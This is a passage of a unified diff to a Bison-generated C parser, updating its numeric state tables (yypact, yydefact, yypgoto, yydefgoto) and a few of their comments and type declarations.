-840, 276, -840, 1279, 437, 439, 105, ++ 440, 441, 442, 443, 444, 449, 450, -840, 34, -34, ++ 438, 451, 452, 456, 486, -840, -840, 314, 488, -840, ++ -26, 567, -840, 254, 575, -840, 268, 576, -840, 271, ++ 579, -840, 281, 580, -840, 286, 581, 513, -840, 101, ++ -840, 465, -11, -840, 466, 461, 590, 530, 472, 467, ++ 592, 394, -840, 158, 594, -840, 298, 595, 596, 238, ++ 394, 394, 394, 394, 394, 599, 523, -840, 338, 485, ++ 81, -840, -840, 36, -840, -840, -840, -840, 238, -840, ++ 324, -840, -840, 38, -840, -840, 238, -840, 331, -840, ++ -840, 45, -840, -840, 315, 276, 276, -840, -840, 480, ++ 606, 253, 483, -840, -1, -840, -840, 33, -840, 314, ++ -840, 400, 605, 607, 608, 609, -840, 171, 418, 418, ++ 418, 418, 418, 493, 494, 418, 495, 497, -840, 418, ++ 492, 496, 498, 1506, -840, 238, -840, 404, 238, -840, ++ 406, 84, -840, 407, -840, -840, 499, 288, 500, -840, ++ 1506, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ 502, -840, 504, -840, -840, -840, 1279, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, 93, 516, -840, 334, ++ -840, -840, 11, -840, 418, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, 515, -840, -840, 128, 100, 505, -840, ++ -840, -840, 506, -840, -840, -840, 507, -840, -840, -840, ++ -840, 508, -840, 84, -840, -840, 510, 642, 517, -840, ++ 735, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, 276, 276, 276, 276, 276, 1279, ++ 1279, 276, 573, 1279, 276, 519, -840, -840, 232, -840, ++ -840, -840, -840, -840, -840, -840, -840, 466, 573, 100, ++ 100, 100, -840, -840, 56, -840, 656, 520, -840, -840, ++ 521, 509, -840, -840, -840, -840, -840, 100, 100, 100, ++ 100, 1506, 134, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, 643, -840, 522, 358, -840, 525, 526, 360, ++ -840, -840, -840, -840, -840, 315, -840, 527, 527, 389, ++ -840, -840, 533, -840, -840, 492, 492, 492, 
-840, -840, ++ 535, 536, -840, -840, 561, -840, -840, 84, 293, -840, ++ 272, 100, 47, -840, -840, -840, -840, -840, -840, 561, ++ -840, -840, -840, -840, -840, 100, 673, 534, 573, 335, ++ -840, -840, -840, -840, 658, 537, -840, -840, 659, -840, ++ 515, 661, 662, -840, 128, -840, 1092, 540, 541, 538, ++ -840, -840, 545, 389, -840, 1506, -840, -840, -840, 418, ++ 418, -840, 584, 552, -840, -840, -840, -840, -840, -840, ++ 519, -840, -840, -840, -840, -840, -840, 843, -840, 548, ++ -840, 584, -840, 100, 690, -840, 561, 549, 558, -840, ++ -840, -840, -840, -840, -840, 100, 100, 559, 100, 100, ++ 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, ++ 644, 644, 644, 543, -840, -840, 547, -840, -840, 563, ++ 683, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, 983, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ 519, 276, 562, -840, 362, 276, 276, 565, 564, -840, ++ -840, -840, -840, -840, -840, -840, 568, -30, -840, -840, ++ 569, -840, 564, -840, 100, -840, 584, 335, 1279, -840, ++ -840, 1279, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, 553, 555, 560, -840, 1336, ++ 1336, 566, 1450, 1393, 694, 156, 572, 578, -840, -840, ++ -840, 577, -840, 276, -840, -840, 84, 627, 276, -840, ++ 274, 276, -840, 564, -840, 583, 585, -840, -840, -840, ++ -840, -840, -840, -840, -840, 90, -840, 559, -840, 582, ++ 586, 587, 364, -840, 267, -840, 593, -840, -840, 589, ++ -840, 367, -840, 570, 293, 373, 570, 276, 573, 584, ++ 591, 701, 314, 712, -840, 156, -840, -840, -840, 52, ++ -840, 584, 642, -840, 84, -840, 597, -840, 519, 600, ++ 570, 584, 276, -840, -840, -840, -840, 602, -840, 564, ++ -840, -840, 1506, 700, 293, 642, 603, 276, 616, -840, ++ 276, 598, 100, 702, 700, 700, 570, -840, 611, 612, ++ 1279, -840, 100, 715, 702, 702, 615, 601, 642, 700, ++ 604, -840, 100, 706, 715, 715, 642, 1279, 700, 702, ++ 617, 
-840, 100, -840, 706, 706, 700, 610, 702, 715, ++ -840, -840, -840, -840, 702, 618, -840, -840, -840, -840 + }; + +-/* YYDEFACT[STATE-NAME] -- Default rule to reduce with in state +- STATE-NUM when YYTABLE doesn't specify something else to do. Zero ++/* YYDEFACT[STATE-NUM] -- Default reduction number in state STATE-NUM. ++ Performed when YYTABLE does not specify something else to do. Zero + means the default is an error. */ +-static const yytype_uint16 yydefact[] = ++static const yytype_int16 yydefact[] = + { + 4, 4, 2, 0, 1, 3, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 151, 352, ++ 0, 0, 0, 0, 0, 0, 0, 0, 151, 353, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 574, 564, 567, 568, 572, 573, 577, 578, +- 579, 580, 581, 582, 583, 584, 585, 586, 587, 310, +- 0, 565, 0, 0, 588, 589, 0, 0, 138, 127, +- 0, 153, 0, 0, 0, 590, 0, 0, 0, 5, ++ 0, 0, 575, 565, 568, 569, 573, 574, 578, 579, ++ 580, 581, 582, 583, 584, 585, 586, 587, 588, 311, ++ 0, 566, 0, 0, 589, 590, 0, 0, 138, 127, ++ 0, 153, 0, 0, 0, 591, 0, 0, 0, 5, + 43, 19, 20, 21, 9, 42, 14, 50, 40, 41, + 46, 16, 17, 15, 44, 45, 18, 22, 23, 24, + 7, 8, 6, 11, 12, 13, 10, 25, 26, 55, + 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, +- 37, 38, 39, 52, 560, 349, 350, 51, 47, 49, +- 372, 48, 53, 54, 0, 557, 0, 0, 86, 57, ++ 37, 38, 39, 52, 561, 350, 351, 51, 47, 49, ++ 373, 48, 53, 54, 0, 558, 0, 0, 86, 57, + 0, 56, 63, 0, 62, 69, 0, 68, 75, 0, +- 74, 81, 0, 0, 306, 277, 0, 278, 280, 281, +- 298, 0, 0, 313, 271, 272, 273, 274, 275, 269, +- 276, 254, 0, 498, 143, 235, 0, 234, 241, 243, +- 0, 242, 255, 256, 257, 230, 231, 0, 222, 208, +- 232, 0, 186, 181, 0, 199, 194, 375, 369, 570, +- 311, 312, 315, 575, 563, 566, 569, 576, 348, 557, +- 0, 121, 0, 0, 133, 0, 132, 154, 0, 498, ++ 74, 81, 0, 0, 307, 278, 0, 279, 281, 282, ++ 299, 0, 0, 314, 272, 273, 274, 275, 276, 270, ++ 277, 255, 0, 499, 143, 236, 0, 235, 242, 244, ++ 0, 243, 256, 257, 258, 231, 232, 0, 223, 208, ++ 233, 0, 186, 181, 0, 199, 194, 376, 370, 
571, ++ 312, 313, 316, 576, 564, 567, 570, 577, 349, 558, ++ 0, 121, 0, 0, 133, 0, 132, 154, 0, 499, + 0, 94, 0, 0, 162, 163, 0, 168, 169, 0, +- 174, 175, 0, 0, 0, 0, 498, 0, 555, 87, ++ 174, 175, 0, 0, 0, 0, 499, 0, 556, 87, + 0, 0, 0, 89, 0, 0, 59, 0, 0, 65, + 0, 0, 71, 0, 0, 77, 0, 0, 83, 80, +- 307, 305, 0, 0, 0, 300, 297, 314, 0, 562, +- 0, 104, 315, 0, 0, 0, 237, 0, 0, 245, ++ 308, 306, 0, 0, 0, 301, 298, 315, 0, 563, ++ 0, 104, 316, 0, 0, 0, 238, 0, 0, 246, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 211, 0, 206, 232, 233, 207, 0, 0, 183, 0, +- 180, 0, 0, 196, 0, 193, 378, 378, 316, 498, +- 571, 555, 498, 0, 123, 0, 0, 0, 0, 135, +- 0, 0, 0, 0, 0, 156, 152, 517, 0, 498, +- 591, 0, 0, 0, 165, 0, 0, 171, 0, 0, +- 177, 0, 351, 498, 373, 517, 543, 0, 0, 0, +- 464, 463, 465, 466, 468, 469, 483, 486, 490, 0, +- 467, 470, 0, 559, 556, 553, 0, 0, 88, 0, +- 0, 58, 0, 0, 64, 0, 0, 70, 0, 0, +- 76, 0, 0, 82, 0, 0, 0, 299, 0, 304, +- 502, 0, 500, 0, 145, 0, 149, 0, 0, 0, +- 0, 236, 0, 0, 244, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 210, 0, 0, 288, 226, +- 227, 0, 224, 228, 229, 209, 0, 182, 0, 190, +- 191, 0, 188, 192, 0, 195, 0, 203, 204, 0, +- 201, 205, 383, 498, 498, 308, 552, 0, 0, 0, +- 0, 142, 0, 140, 131, 0, 129, 0, 134, 0, +- 0, 0, 0, 0, 155, 0, 315, 315, 315, 315, +- 315, 0, 0, 315, 0, 516, 518, 315, 328, 0, +- 0, 0, 374, 0, 164, 0, 0, 170, 0, 0, +- 176, 0, 561, 106, 0, 0, 0, 484, 0, 488, +- 489, 474, 473, 475, 476, 478, 479, 487, 471, 491, +- 472, 485, 477, 480, 517, 558, 441, 442, 91, 92, +- 90, 61, 60, 67, 66, 73, 72, 79, 78, 85, +- 84, 302, 303, 301, 0, 0, 499, 0, 105, 146, +- 0, 144, 315, 239, 353, 354, 240, 238, 247, 246, +- 213, 214, 215, 216, 217, 218, 219, 220, 221, 212, +- 0, 282, 289, 0, 0, 0, 225, 185, 184, 0, +- 189, 198, 197, 0, 202, 384, 385, 386, 379, 380, +- 0, 376, 370, 0, 295, 0, 125, 0, 372, 122, +- 139, 141, 128, 130, 137, 136, 159, 160, 161, 158, +- 157, 498, 498, 498, 498, 498, 517, 517, 498, 492, +- 0, 498, 346, 528, 95, 0, 93, 592, 167, 166, +- 173, 
172, 179, 178, 0, 492, 0, 0, 0, 547, +- 548, 0, 545, 248, 0, 481, 482, 0, 230, 506, +- 507, 504, 503, 501, 0, 0, 0, 0, 0, 0, +- 109, 119, 111, 112, 113, 117, 114, 118, 147, 0, +- 150, 0, 0, 284, 0, 0, 0, 291, 287, 223, +- 187, 200, 383, 382, 387, 387, 317, 296, 367, 0, +- 124, 126, 328, 328, 328, 523, 524, 0, 0, 527, +- 493, 494, 519, 554, 0, 329, 330, 338, 0, 0, +- 97, 101, 99, 100, 102, 107, 494, 549, 550, 551, +- 544, 546, 0, 250, 0, 492, 232, 270, 266, 115, +- 116, 0, 0, 110, 148, 0, 283, 0, 0, 0, +- 290, 0, 381, 389, 0, 0, 326, 321, 322, 0, +- 318, 319, 0, 520, 521, 522, 315, 315, 495, 593, +- 0, 332, 333, 334, 335, 336, 337, 346, 339, 341, +- 342, 343, 344, 340, 0, 103, 0, 98, 593, 249, +- 0, 252, 460, 494, 0, 0, 108, 286, 285, 293, +- 294, 292, 0, 0, 352, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 443, 443, 443, +- 0, 529, 531, 539, 534, 449, 0, 0, 398, 394, +- 392, 393, 404, 405, 406, 407, 408, 409, 410, 411, +- 412, 413, 414, 415, 403, 416, 402, 400, 399, 395, +- 397, 396, 0, 390, 401, 418, 447, 417, 451, 541, +- 419, 533, 536, 537, 538, 377, 371, 346, 498, 0, +- 320, 0, 498, 498, 0, 496, 347, 331, 362, 359, +- 358, 363, 361, 0, 355, 360, 345, 0, 96, 496, +- 251, 0, 542, 593, 232, 517, 279, 268, 517, 258, +- 259, 260, 261, 262, 263, 264, 265, 267, 422, 421, +- 420, 444, 0, 0, 0, 426, 0, 0, 0, 0, +- 0, 0, 0, 434, 0, 388, 391, 327, 324, 309, +- 498, 525, 526, 595, 0, 498, 357, 346, 498, 253, +- 496, 505, 0, 0, 423, 424, 425, 539, 530, 532, +- 446, 540, 0, 535, 0, 450, 0, 0, 0, 0, +- 429, 0, 427, 0, 325, 323, 0, 596, 0, 497, +- 456, 365, 0, 456, 498, 492, 593, 0, 0, 0, +- 0, 428, 0, 438, 439, 440, 0, 436, 593, 295, +- 594, 0, 457, 0, 356, 346, 0, 456, 593, 498, +- 431, 432, 433, 430, 0, 437, 496, 368, 597, 0, +- 512, 366, 295, 0, 498, 453, 435, 498, 0, 0, +- 510, 512, 512, 456, 454, 0, 0, 517, 513, 0, +- 514, 510, 510, 0, 0, 295, 512, 0, 511, 0, +- 508, 514, 514, 295, 517, 512, 510, 0, 515, 0, +- 462, 508, 508, 512, 0, 510, 514, 458, 509, 459, +- 461, 510, 0, 
452, 448, 120, 455 ++ 0, 211, 0, 206, 233, 234, 207, 0, 0, 183, ++ 0, 180, 0, 0, 196, 0, 193, 379, 379, 317, ++ 499, 572, 556, 499, 0, 123, 0, 0, 0, 0, ++ 135, 0, 0, 0, 0, 0, 156, 152, 518, 0, ++ 499, 592, 0, 0, 0, 165, 0, 0, 171, 0, ++ 0, 177, 0, 352, 499, 374, 518, 544, 0, 0, ++ 0, 465, 464, 466, 467, 469, 470, 484, 487, 491, ++ 0, 468, 471, 0, 560, 557, 554, 0, 0, 88, ++ 0, 0, 58, 0, 0, 64, 0, 0, 70, 0, ++ 0, 76, 0, 0, 82, 0, 0, 0, 300, 0, ++ 305, 503, 0, 501, 0, 145, 0, 149, 0, 0, ++ 0, 0, 237, 0, 0, 245, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 210, 0, 0, ++ 289, 227, 228, 0, 225, 229, 230, 209, 0, 182, ++ 0, 190, 191, 0, 188, 192, 0, 195, 0, 203, ++ 204, 0, 201, 205, 384, 499, 499, 309, 553, 0, ++ 0, 0, 0, 142, 0, 140, 131, 0, 129, 0, ++ 134, 0, 0, 0, 0, 0, 155, 0, 316, 316, ++ 316, 316, 316, 0, 0, 316, 0, 517, 519, 316, ++ 329, 0, 0, 0, 375, 0, 164, 0, 0, 170, ++ 0, 0, 176, 0, 562, 106, 0, 0, 0, 485, ++ 0, 489, 490, 475, 474, 476, 477, 479, 480, 488, ++ 472, 492, 473, 486, 478, 481, 518, 559, 442, 443, ++ 91, 92, 90, 61, 60, 67, 66, 73, 72, 79, ++ 78, 85, 84, 303, 304, 302, 0, 0, 500, 0, ++ 105, 146, 0, 144, 316, 240, 354, 355, 241, 239, ++ 248, 247, 213, 214, 215, 216, 217, 218, 219, 220, ++ 221, 222, 212, 0, 283, 290, 0, 0, 0, 226, ++ 185, 184, 0, 189, 198, 197, 0, 202, 385, 386, ++ 387, 380, 381, 0, 377, 371, 0, 296, 0, 125, ++ 0, 373, 122, 139, 141, 128, 130, 137, 136, 159, ++ 160, 161, 158, 157, 499, 499, 499, 499, 499, 518, ++ 518, 499, 493, 0, 499, 347, 529, 95, 0, 93, ++ 593, 167, 166, 173, 172, 179, 178, 0, 493, 0, ++ 0, 0, 548, 549, 0, 546, 249, 0, 482, 483, ++ 0, 231, 507, 508, 505, 504, 502, 0, 0, 0, ++ 0, 0, 0, 109, 119, 111, 112, 113, 117, 114, ++ 118, 147, 0, 150, 0, 0, 285, 0, 0, 0, ++ 292, 288, 224, 187, 200, 384, 383, 388, 388, 318, ++ 297, 368, 0, 124, 126, 329, 329, 329, 524, 525, ++ 0, 0, 528, 494, 495, 520, 555, 0, 330, 331, ++ 339, 0, 0, 97, 101, 99, 100, 102, 107, 495, ++ 550, 551, 552, 545, 547, 0, 251, 0, 493, 233, ++ 271, 267, 115, 116, 
0, 0, 110, 148, 0, 284, ++ 0, 0, 0, 291, 0, 382, 390, 0, 0, 327, ++ 322, 323, 0, 319, 320, 0, 521, 522, 523, 316, ++ 316, 496, 594, 0, 333, 334, 335, 336, 337, 338, ++ 347, 340, 342, 343, 344, 345, 341, 0, 103, 0, ++ 98, 594, 250, 0, 253, 461, 495, 0, 0, 108, ++ 287, 286, 294, 295, 293, 0, 0, 353, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 444, 444, 444, 0, 530, 532, 540, 535, 450, 0, ++ 0, 399, 395, 393, 394, 405, 406, 407, 408, 409, ++ 410, 411, 412, 413, 414, 415, 416, 404, 417, 403, ++ 401, 400, 396, 398, 397, 0, 391, 402, 419, 448, ++ 418, 452, 542, 420, 534, 537, 538, 539, 378, 372, ++ 347, 499, 0, 321, 0, 499, 499, 0, 497, 348, ++ 332, 363, 360, 359, 364, 362, 0, 356, 361, 346, ++ 0, 96, 497, 252, 0, 543, 594, 233, 518, 280, ++ 269, 518, 259, 260, 261, 262, 263, 264, 265, 266, ++ 268, 423, 422, 421, 445, 0, 0, 0, 427, 0, ++ 0, 0, 0, 0, 0, 0, 435, 0, 389, 392, ++ 328, 325, 310, 499, 526, 527, 596, 0, 499, 358, ++ 347, 499, 254, 497, 506, 0, 0, 424, 425, 426, ++ 540, 531, 533, 447, 541, 0, 536, 0, 451, 0, ++ 0, 0, 0, 430, 0, 428, 0, 326, 324, 0, ++ 597, 0, 498, 457, 366, 0, 457, 499, 493, 594, ++ 0, 0, 0, 0, 429, 0, 439, 440, 441, 0, ++ 437, 594, 296, 595, 0, 458, 0, 357, 347, 0, ++ 457, 594, 499, 432, 433, 434, 431, 0, 438, 497, ++ 369, 598, 0, 513, 367, 296, 0, 499, 454, 436, ++ 499, 0, 0, 511, 513, 513, 457, 455, 0, 0, ++ 518, 514, 0, 515, 511, 511, 0, 0, 296, 513, ++ 0, 512, 0, 509, 515, 515, 296, 518, 513, 511, ++ 0, 516, 0, 463, 509, 509, 513, 0, 511, 515, ++ 459, 510, 460, 462, 511, 0, 453, 449, 120, 456 ++}; ++ ++/* YYPGOTO[NTERM-NUM]. 
*/ ++static const yytype_int16 yypgoto[] = ++{ ++ -840, -840, 754, -840, -840, -408, -840, -840, -840, 434, ++ -840, -840, -840, 415, -840, -840, -840, 386, -840, -840, ++ -840, 384, -840, -840, -840, 411, -840, -840, -840, 427, ++ -622, -840, -840, -840, 91, -840, -840, -840, -840, -840, ++ 165, -840, 143, -840, -615, -840, -840, -840, -840, -840, ++ -840, 345, -840, -840, -840, 340, -840, -840, -840, 350, ++ -264, -840, -840, -840, -261, -840, -840, -840, 363, -840, ++ -840, -840, 311, -840, -840, -840, 346, -840, -840, -840, ++ 332, -840, -840, -840, 375, -840, -840, 445, -840, -840, ++ -840, 446, -840, -840, 398, -840, -840, -840, -840, 448, ++ -840, -840, 453, 17, -276, -840, -840, -840, 455, -840, ++ -840, -840, -840, 457, -840, -840, -840, -840, -840, -840, ++ -513, -840, -840, -840, -840, -840, -840, -840, -840, -595, ++ -840, -840, -840, -593, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, 102, -268, ++ -840, -840, 99, -839, -840, -840, -840, 454, -840, -13, ++ -840, -510, -840, -840, -840, -225, -840, -840, 94, -840, ++ -840, -239, -790, -840, -840, -653, -840, -27, 772, 613, ++ -351, -840, -840, -578, -573, -840, -840, -561, -840, 835, ++ -216, -840, -840, 539, -840, 167, -840, 170, -840, 15, ++ -840, -840, -840, -116, -840, -840, -118, -436, -272, -840, ++ -840, -48, -840, -840, -52, -840, -840, -788, -840, 12, ++ -840, -598, -644, -837, -194, -840, 318, -840, -503, -734, ++ -735, -786, -342, -840, 243, -840, -840, -840, -366, -840, ++ -44, -840, -840, 14, -840, -840, 230, 0, -840, 556, ++ 660, -10, -205, -722, -840 + }; + + /* YYDEFGOTO[NTERM-NUM]. 
*/ + static const yytype_int16 yydefgoto[] = + { +- -1, 1, 2, 3, 79, 80, 81, 141, 245, 246, ++ 0, 1, 2, 3, 79, 80, 81, 141, 245, 246, + 82, 144, 248, 249, 83, 147, 251, 252, 84, 150, + 254, 255, 85, 153, 257, 258, 86, 138, 242, 243, +- 87, 329, 616, 699, 700, 701, 88, 393, 89, 624, +- 538, 649, 650, 651, 90, 314, 450, 587, 91, 213, +- 455, 456, 92, 216, 318, 319, 93, 212, 452, 453, +- 94, 272, 396, 397, 95, 96, 219, 324, 325, 97, +- 224, 333, 334, 98, 227, 336, 337, 99, 230, 339, +- 340, 100, 192, 297, 298, 300, 431, 432, 101, 195, +- 302, 303, 305, 439, 440, 102, 188, 293, 289, 290, +- 292, 421, 422, 189, 295, 103, 177, 275, 276, 104, +- 105, 181, 278, 279, 713, 771, 872, 106, 107, 108, +- 109, 813, 814, 815, 816, 817, 818, 819, 820, 655, +- 822, 823, 110, 656, 111, 112, 113, 114, 115, 116, +- 117, 118, 825, 119, 120, 423, 561, 662, 663, 677, +- 564, 666, 667, 678, 121, 162, 264, 265, 122, 155, +- 156, 123, 583, 202, 268, 309, 739, 740, 741, 945, +- 848, 613, 695, 757, 764, 696, 697, 124, 125, 126, +- 546, 866, 952, 127, 128, 307, 675, 129, 235, 588, +- 131, 306, 674, 443, 578, 579, 580, 734, 832, 833, +- 834, 903, 939, 940, 942, 966, 967, 518, 892, 835, +- 898, 836, 837, 901, 838, 1005, 1014, 973, 989, 839, +- 362, 691, 749, 915, 271, 391, 392, 642, 1030, 1010, +- 1000, 1020, 474, 475, 476, 840, 896, 897, 841, 900, +- 842, 843, 899, 844, 496, 631, 632, 477, 478, 365, +- 238, 135, 331, 855, 948 +-}; +- +-/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing +- STATE-NUM. 
*/ +-#define YYPACT_NINF -823 +-static const yytype_int16 yypact[] = +-{ +- -823, 143, -823, 1215, -823, -823, -1, 60, 86, 87, +- 68, 69, 119, 119, 119, 119, 71, 24, 119, 119, +- 119, 119, 119, 119, 119, 119, 1503, 8, -823, -823, +- 13, 137, 34, 119, 119, 119, 46, 322, 50, 52, +- 85, 85, -823, -823, -823, 111, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, 364, +- 154, 296, 217, 1503, -823, -823, 497, 270, -823, -823, +- 74, 89, 497, 85, 102, -823, 63, 65, 67, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, 140, 167, -823, -823, -823, -823, +- 311, -823, -823, -823, 94, -823, 219, 160, -823, -823, +- 207, -823, -823, 214, -823, -823, 216, -823, -823, 221, +- -823, -823, 231, 119, -823, -823, 175, -823, -823, -823, +- -823, 28, 119, 341, -823, -823, -823, -823, -823, -823, +- -823, -823, 85, 215, -823, -823, 309, -823, -823, -823, +- 243, -823, -823, -823, -823, -823, -823, 295, 242, -823, +- 276, 263, 249, -823, 285, 265, -823, -823, 45, -823, +- -823, -823, 405, -823, -823, -823, 384, -823, 167, -823, +- 75, -823, 308, 366, -823, 406, -823, -823, 259, 215, +- 336, 345, 497, 407, -823, -823, 408, -823, -823, 409, +- -823, -823, 497, 217, 1503, 479, 107, 227, 138, -823, +- 393, 394, 313, -823, 395, 320, -823, 399, 324, -823, +- 400, 326, -823, 401, 329, -823, 402, 331, -823, -823, +- -823, -823, 403, 410, 333, -823, -823, -823, 119, -823, +- 518, -823, 18, 411, 414, 337, -823, 433, 340, -823, +- 437, 439, 440, 441, 442, 443, 445, 449, 450, 342, +- -823, 332, -823, 276, -823, -823, 451, 346, -823, 306, +- -823, 452, 348, -823, 306, -823, 390, 390, -823, 215, +- -823, 138, 215, 398, 453, 527, 529, 455, 350, -823, +- 457, 462, 463, 464, 352, -823, -823, 1276, 85, 215, +- -823, -22, 465, 354, -823, 466, 
356, -823, 467, 358, +- -823, 29, -823, 215, -823, 1276, 469, 470, 108, 471, +- 472, 473, 474, 475, 480, 481, -823, -40, 185, 468, +- 482, 483, 456, 544, -823, -823, 287, 534, -823, 160, +- 606, -823, 207, 607, -823, 214, 608, -823, 216, 611, +- -823, 221, 612, -823, 231, 613, 542, -823, 28, -823, +- 495, -21, -823, 496, 491, 620, 560, 503, 499, 625, +- 397, -823, 309, 626, -823, 243, 627, 628, 322, 397, +- 397, 397, 397, 631, 555, -823, 295, 516, 90, -823, +- -823, 38, -823, -823, -823, -823, 322, -823, 263, -823, +- -823, 25, -823, -823, 322, -823, 285, -823, -823, 35, +- -823, -823, 359, 215, 215, -823, -823, 511, 636, 842, +- 513, -823, 21, -823, -823, 31, -823, 287, -823, 406, +- 638, 639, 642, 643, -823, 259, 405, 405, 405, 405, +- 405, 520, 528, 405, 531, 532, -823, 405, 526, 535, +- 533, 497, -823, 322, -823, 407, 322, -823, 408, 85, +- -823, 409, -823, -823, 537, 330, 524, -823, 497, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, 536, -823, +- 538, -823, -823, -823, 1276, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, 103, 518, -823, 283, -823, -823, +- 22, -823, 405, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- 546, -823, -823, 171, 119, 539, -823, -823, -823, 545, +- -823, -823, -823, 547, -823, -823, -823, -823, 540, -823, +- 85, -823, -823, 548, 680, 543, -823, 203, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, 215, 215, 215, 215, 215, 1276, 1276, 215, 599, +- 1276, 215, 554, -823, -823, 152, -823, -823, -823, -823, +- -823, -823, -823, -823, 496, 599, 119, 119, 119, -823, +- -823, 59, -823, 683, 556, -823, -823, 557, 549, -823, +- -823, -823, -823, -823, 119, 119, 119, 119, 497, 61, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, 673, +- -823, 553, 362, -823, 558, 559, 365, -823, -823, -823, +- -823, -823, 359, -823, 561, 561, 404, -823, -823, 564, +- -823, 
-823, 526, 526, 526, -823, -823, 566, 568, -823, +- -823, 585, -823, -823, 85, 294, -823, 258, 119, 57, +- -823, -823, -823, -823, -823, -823, 585, -823, -823, -823, +- -823, -823, 119, 694, 567, 599, 276, -823, -823, -823, +- -823, 688, 569, -823, -823, 690, -823, 546, 692, 693, +- -823, 171, -823, 1089, 572, 573, 577, -823, -823, 578, +- 404, -823, 497, -823, -823, -823, 405, 405, -823, 604, +- 581, -823, -823, -823, -823, -823, -823, 554, -823, -823, +- -823, -823, -823, -823, 732, -823, 580, -823, 604, -823, +- 119, 717, -823, 585, 579, 588, -823, -823, -823, -823, +- -823, -823, 119, 119, 589, 119, 119, 119, 119, 119, +- 119, 119, 119, 119, 119, 119, 119, 672, 672, 672, +- 575, -823, -823, 582, -823, -823, 593, 712, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, 980, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, 554, 215, 591, +- -823, 367, 215, 215, 595, 596, -823, -823, -823, -823, +- -823, -823, -823, 598, -31, -823, -823, 600, -823, 596, +- -823, 119, -823, 604, 276, 1276, -823, -823, 1276, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, 584, 587, 592, -823, 1333, 1333, 594, 1447, +- 1390, 716, 235, 602, 610, -823, -823, -823, 609, -823, +- 215, -823, -823, 85, 657, 215, -823, 298, 215, -823, +- 596, -823, 614, 618, -823, -823, -823, -823, -823, -823, +- -823, -823, 121, -823, 589, -823, 630, 632, 633, 372, +- -823, 306, -823, 637, -823, -823, 634, -823, 376, -823, +- 616, 294, 379, 616, 215, 599, 604, 641, 731, 287, +- 755, -823, 235, -823, -823, -823, 42, -823, 604, 680, +- -823, 85, -823, 640, -823, 554, 645, 616, 604, 215, +- -823, -823, -823, -823, 646, -823, 596, -823, -823, 497, +- 742, 294, 680, 664, 215, 624, -823, 215, 644, 119, +- 747, 742, 742, 616, -823, 665, 669, 1276, -823, 119, +- 763, 747, 747, 670, 649, 680, 742, 676, -823, 119, +- 783, 763, 763, 680, 1276, 
742, 747, 660, -823, 119, +- -823, 783, 783, 742, 681, 747, 763, -823, -823, -823, +- -823, 747, 662, -823, -823, -823, -823 ++ 87, 330, 619, 702, 703, 704, 88, 394, 89, 627, ++ 540, 652, 653, 654, 90, 315, 452, 590, 91, 213, ++ 457, 458, 92, 216, 319, 320, 93, 212, 454, 455, ++ 94, 272, 397, 398, 95, 96, 219, 325, 326, 97, ++ 224, 334, 335, 98, 227, 337, 338, 99, 230, 340, ++ 341, 100, 192, 298, 299, 301, 433, 434, 101, 195, ++ 303, 304, 306, 441, 442, 102, 188, 294, 290, 291, ++ 293, 423, 424, 189, 296, 103, 177, 275, 276, 104, ++ 105, 181, 278, 279, 716, 774, 875, 106, 107, 108, ++ 109, 816, 817, 818, 819, 820, 821, 822, 823, 658, ++ 825, 826, 110, 659, 111, 112, 113, 114, 115, 116, ++ 117, 118, 828, 119, 120, 425, 564, 665, 666, 680, ++ 567, 669, 670, 681, 121, 162, 264, 265, 122, 155, ++ 156, 123, 586, 202, 268, 310, 742, 743, 744, 948, ++ 851, 616, 698, 760, 767, 699, 700, 124, 125, 126, ++ 548, 869, 955, 127, 128, 308, 678, 129, 235, 591, ++ 131, 307, 677, 445, 581, 582, 583, 737, 835, 836, ++ 837, 906, 942, 943, 945, 969, 970, 520, 895, 838, ++ 901, 839, 840, 904, 841, 1008, 1017, 976, 992, 842, ++ 363, 694, 752, 918, 271, 392, 393, 645, 1033, 1013, ++ 1003, 1023, 476, 477, 478, 843, 899, 900, 844, 903, ++ 845, 846, 902, 847, 498, 634, 635, 479, 480, 366, ++ 238, 135, 332, 858, 951 + }; + +-/* YYPGOTO[NTERM-NUM]. 
